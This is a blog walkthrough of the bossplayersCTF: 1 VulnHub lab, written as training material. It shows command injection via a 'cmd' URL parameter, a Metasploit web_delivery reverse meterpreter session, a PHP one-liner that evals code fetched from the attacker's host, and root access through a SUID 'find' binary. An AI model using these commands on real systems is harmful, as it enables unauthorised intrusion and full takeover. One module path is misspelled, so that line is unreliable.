bossplayersCTF: 1 walkthrough vulnhub

bossplayersCTF: 1 walkthrough vulnhub CTF |

In this article, we are solving bossplayersCTF: 1 Vulnhub CTF the motto of the lab is the root account access this VM is created by Cuong Nguyen.

you can Download here this VM here

Description bossplayersCTF: 1

Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF’s. It should take around 30 minutes to root.

Network Scanning

Let’s start by scanning the network to find our target. In my case, the IP is 192.168.1.109

netdiscover
bossplayersCTF: 1  walkthrough vulnhub

Our Next step is scanning all port and services our target machine.

nmap -A 192.168.1.109

Our Nmap scanning is complete and we see the target machine open port 22 SSH, and 80 HTTP

Enumeration

we find that port 80 is running http, so we open the IP in our browser.

http://192.168.1.109
bossplayersCTF: 1  walkthrough vulnhub

The front page I didn’t see any important stuff I move on our next step checking the source code of the webpage and last of the page I found a base64 encode the value.

view-source:http://192.168.1.109/
bossplayersCTF: 1  walkthrough vulnhub

First-time decode

echo "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK" |base64 -d

Second-time decode

echo "ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K" |base64 -d

Last time decode and we see some interesting php file location

echo "d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==" |base64 -d
bossplayersCTF: 1   vulnhub writeup

and I tried to open this file our browser and it shows me system install file and Outstanding and we see a text Test ping command comment

http://192.168.1.109/workingprogress.php

we tried to open the passwd file using cat command through the URL and we see the target passwd file that’s mean this URL is a vulnerable command injection

http://192.168.1.109/workingprogress.php?cmd=cat /etc/passwd
bossplayersCTF: 1   vulnhub writeup

we are continuing with Metasploit’s web delivery Module to compromise the host machine in order to obtain a reverse connection.

msfconsole
use exploit/muli/script/web_delivery
set target 1

set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.18

set lport 4545

run
bossplayersCTF: 1  walkthrough  vulnhub

This will generate a malicious PHP code which you’ll use for command execution on the web URL I copy the malicious code and paste it inside the URL and hit enter

http://192.168.1.109/workingprogress.php?cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.18:8080/syOqX0Xl7'));"

we see the terminal new meterpreter session is open

sessions 1
bossplayersCTF: 1  walkthrough  vulnhub

After running the shell command we see a blank shell

shell

Importing spawn shell through python3 run this command

python3 -c 'import pty;pty.spawn("/bin/bash")'

I start to enumerate the target machine but I didn’t find an important file directory

cd /home
cd cuong

ls -lsa

Privilege Escalation

Moving on, privilege escalation By using the following command you can enumerate all binaries file having SUID permissions: set

find / -type f -perm -u=s 2>/dev/null

we see the many files but I focus on find command I search on google and I found a find command privilege escalation script

/usr/bin/find . -exec /bin/bash -p \; -quit

I move on the root user home directory ls command to we see our root flag

cd /root

ls

Reading root Flag

cat root.txt
Sar: 1 Vulnhub walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

One Comment on “bossplayersCTF: 1 walkthrough vulnhub”

  1. bossplayersCTF: 1 walkthrough vulnhub CTF | bossplayersCTF: 1 Vulnhub writeup, vulnhub walkthrough, vulnhub writeup, vulnhub ctf walkthrough

Leave a Reply

Your email address will not be published. Required fields are marked *